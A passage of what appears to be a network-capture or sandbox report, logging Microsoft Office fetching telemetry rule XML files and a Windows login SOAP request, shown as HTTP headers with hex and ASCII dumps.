                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210236Z-16849878b785jrf8dn0d2rczaw00000006ng00000000shu9
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                99192.168.2.54987613.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:36 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 432
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 6741ff86-f01e-00aa-74b9-268521000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210236Z-16849878b78bjkl8dpep89pbgg000000049000000000bpdt
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                100192.168.2.54987713.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:36 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 475
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 8e6218f7-d01e-0066-7d57-27ea17000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210236Z-16849878b787bfsh7zgp804my400000004c000000000b4ve
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                101192.168.2.54987813.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:37 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 48ec36c7-d01e-00a1-338d-2735b1000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210237Z-16849878b78xblwksrnkakc08w00000004sg00000000nydg
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                102192.168.2.54987913.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:37 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 474
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: df439d9f-401e-0067-5610-2709c2000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210237Z-16849878b78q9m8bqvwuva4svc0000000450000000005zme
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                103192.168.2.54988113.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:37 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: f9fbd553-601e-003e-5c2e-273248000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210237Z-16849878b787bfsh7zgp804my400000004dg000000004epu
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                104192.168.2.54988213.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:37 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: f6a2cc2d-401e-0015-3796-250e8d000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210237Z-16849878b78wc6ln1zsrz6q9w800000005ag000000002eg8
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                105192.168.2.54988020.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 3592
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:37 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C555_SN1
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 9ba62b08-5c3f-44e2-9ddf-20cfffb4bd59
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: SN1PEPF0003FB41 V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:37 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 11392
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                106192.168.2.54988313.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:37 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 405
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 8a3f5c5e-301e-000c-55dc-26323f000000
